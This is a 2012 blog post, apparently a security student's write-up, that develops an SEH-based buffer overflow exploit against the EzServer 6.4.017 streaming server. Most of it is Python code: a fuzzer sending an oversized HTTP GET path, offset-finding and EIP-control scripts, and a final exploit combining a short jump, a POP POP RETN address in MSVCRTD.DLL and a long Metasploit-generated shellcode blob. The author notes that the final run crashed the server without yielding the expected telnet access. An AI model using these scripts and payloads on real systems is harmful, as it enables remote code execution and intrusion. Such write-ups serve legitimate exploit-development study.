=======================================================

Monday, October 1, 2012

BUFFER OVERFLOW (SEH): EZSERVER ( 6.4.017 )

In this section, i try to observed ezserver aplication version 6.4.017. Let's to hunt:

1. Analyse the aplication to see attack vektor.
     ==> Ezserver is aplication to stream multimedia file like movie etc which accessed
             url : http://url:8000/admin/index.html
     ==> So we can test with fuzzer from url but we must known the header that not
             rejected or fail.
This is my screenshot of ezserver to see information about this aplication:











2. See the header with wireshark.
    ==> Follow with ==> Follow TCP stream.

 

Header is ==> GET /....... HTTP/1.1
So i can give buffer in ...........==> GET /<buffer>. HTTP/1.1

3. Crete fuzzer with python==>fuzzer.py.
 #!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
#target_url="/admin/index.html"
buffer="\x41" * 8000
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send("GET /" + buffer + "HTTP/1.1\r\n\r\n\r\n")
print("kirim")
sock.close()

4. Running Fuzzer file and see the effect with ollydbg ==> # python fuzzer.py
     ==> View SEH chain

   ==> Shift + F9
     ==> EIP overwrited with 41414141

5.  Create pattern with Msf to see offset.



6.  Modify fuzzer with pattern to see offset

 #!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8A.........."
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send("GET /" + buffer + "HTTP/1.1\r\n\r\n\r\n")
print("kirim")
sock.close()


7. See value off overwrited EIP ==> Cek Offset with ==> pattern offset.



        ==> Offset ==> 5883


8. Modify to control EIP.

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90"*5879
buffer+="\xcc\xcc\xcc\xcc"
buffer+="\x41\x41\x41\x41"
buffer+="\x90"*(8000-len(buffer))
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send("GET /" + buffer + "HTTP/1.1\r\n\r\n\r\n")
print("kirim")
sock.close()

==> running fuzzer==> see SEH chain ==> Shift+F9

    ==> EIP overwrited ==> 41414141 ( 4 bit )

9. Looking for modul to execute POP POP RETN


   ==> I will try using MSVCRTD.DLL module
   ==> Cek with Msfpescan to see posibility safeSEH

  

10. Looking for POP POP RETN address of MSVCRTD.DLL
       ==> Executables modules ==> double click MSVCRTD.DLL ==> search PPR



11.  Generate payload with msf ==> modify fuzzer with jump short command

    ==> Modify Fuzzer

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90"*5879
buffer+="\xeb\x06\x90\x90"
buffer+="\x96\x96\x20\x10"
buffer+=("\xb8\x64\xa6\xaa\x44\x2b\xc9\xdb\xd4\xd9\x74\x24\xf4\xb1\x51\x5b"
"\x31\x43\x10\x03\x43\x10\x83\x8f\x5a\x48\xb1\xb3\xc9\x66\x77\xa3"
"\xf7\x86\x77\xcc\x68\xf2\xe4\x16\x4d\x8f\xb0\x6a\x06\xf3\x3f\xea"
"\x19\xe3\xcb\x45\x02\x70\x94\x79\x33\x6d\x62\xf2\x07\xfa\x74\xea"
"\x59\x3c\xef\x5e\x1d\x7c\x64\x99\xdf\xb7\x88\xa4\x1d\xac\x67\x9d"
"\xf5\x17\xa0\x94\x10\xdc\xef\x72\xda\x08\x69\xf1\xd0\x85\xfd\x5a"
"\xf5\x18\xe9\x67\x29\x90\x64\x0b\x15\xba\x17\x10\x64\x19\xb3\x1d"
"\xc4\xad\xb7\x61\xc7\x46\xb7\x7d\x7a\xd3\x78\x75\xda\x8c\xf6\xcb"
"\xec\xa0\x57\x2c\x26\x5e\x0b\xb4\xaf\xac\x99\x50\x47\xa0\xef\xff"
"\xf3\xb9\xc0\x97\x30\xa8\x1d\x5c\x97\xcc\x08\xfd\x9e\xd6\xd3\x80"
"\x4c\x10\x1e\xd7\xe4\x23\xe1\x07\x90\xfa\x14\x52\xcc\xaa\xd9\x4a"
"\x5c\x06\x75\x21\x30\xeb\x2a\x86\xe5\x14\x1c\x6e\x62\xfa\xc1\x08"
"\x21\x75\x18\x41\xad\x21\xc1\x19\xe9\x7d\x09\x0f\x9f\x91\xa4\xfa"
"\x9f\x42\x2e\xa0\xcd\x4d\x46\xff\xf2\x44\xcb\xaa\xf3\xb9\x84\xb1"
"\x45\xbc\x1c\x6e\xa9\x16\xce\xc4\x01\xc2\x10\x34\x3a\x84\x09\xcd"
"\xfb\x2c\x81\xd2\xd2\x9a\xd2\xfc\xbd\x4e\x49\x9a\x29\xec\xfc\xeb"
"\x4f\x98\xae\xb2\xa6\x91\xc6\xa3\xd3\x6d\x50\xc9\x15\xae\x91\xa7"
"\xa8\x6c\x7b\x49\x16\x5d\x10\x38\xed\xa5\xbd\xe9\xb9\xbe\xb3\x13"
"\x0e\x28\xcb\x9e\x35\xaa\xe5\x3b\xe1\x06\x5b\xea\x5c\xcd\x5a\x5d"
"\x0e\x44\x0c\xa2\x60\x0e\x03\x85\x84\x01\x08\xca\x51\xf7\x50\xcb"
"\x69\xf7\x7f\xb8\xc1\xfb\x03\x7a\x89\xfc\xd2\xd0\xad\xd3\xb3\xaa"
"\x89\x36\x30\x01\xd5\x61\x48\x75")
buffer+="\x90"*(8000-len(buffer))
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send("GET /" + buffer + "HTTP/1.1\r\n\r\n\r\n")
print("kirim")
sock.close()



12.  Try to execute fuzzer without ollydbg.

        ==> Aplication crash ==> try to telnet==>don't work

     

13.
Time

No comments:

Post a Comment

Subscribe to: Post Comments (Atom) 

==========================================================================
==========================================================================
                                                                
IIIIIIIIII   SSSSSSSSSSSSSSS  222222222222222           CCCCCCCCCCCCC
I::::::::I SS:::::::::::::::S2:::::::::::::::22      CCC::::::::::::C
I::::::::IS:::::SSSSSS::::::S2::::::222222:::::2   CC:::::::::::::::C
II::::::IIS:::::S     SSSSSSS2222222     2:::::2  C:::::CCCCCCCC::::C
  I::::I  S:::::S                        2:::::2 C:::::C       CCCCCC
  I::::I  S:::::S                        2:::::2C:::::C              
  I::::I   S::::SSSS                  2222::::2 C:::::C              
  I::::I    SS::::::SSSSS        22222::::::22  C:::::C              
  I::::I      SSS::::::::SS    22::::::::222    C:::::C              
  I::::I         SSSSSS::::S  2:::::22222       C:::::C              
  I::::I              S:::::S2:::::2            C:::::C              
  I::::I              S:::::S2:::::2             C:::::C       CCCCCC
II::::::IISSSSSSS     S:::::S2:::::2       222222 C:::::CCCCCCCC::::C
I::::::::IS::::::SSSSSS:::::S2::::::2222222:::::2  CC:::::::::::::::C
I::::::::IS:::::::::::::::SS 2::::::::::::::::::2    CCC::::::::::::C
IIIIIIIIII SSSSSSSSSSSSSSS   22222222222222222222       CCCCCCCCCCCCC
                                                                   
==========================================================================
==========================================================================

My Classmate

Show All 

==========================================================================
        (        )      )          (    (           (     
  *   ) )\ )  ( /(   ( /(   (      )\ ) )\ )        )\ )  
` )  /((()/(  )\())  )\())  )\    (()/((()/(   (   (()/(  
 ( )(_))/(_))((_)\  ((_)\((((_)(   /(_))/(_))  )\   /(_)) 
(_(_())(_)) __ ((_)  _((_))\ _ )\ (_)) (_))_  ((_) (_))   
|_   _|| _ \\ \ / / | || |(_)_\(_)| _ \ |   \ | __|| _ \  
  | |  |   / \ V /  | __ | / _ \  |   / | |) || _| |   /  
  |_|  |_|_\  |_|   |_||_|/_/ \_\ |_|_\ |___/ |___||_|_\  
                                                         
==========================================================================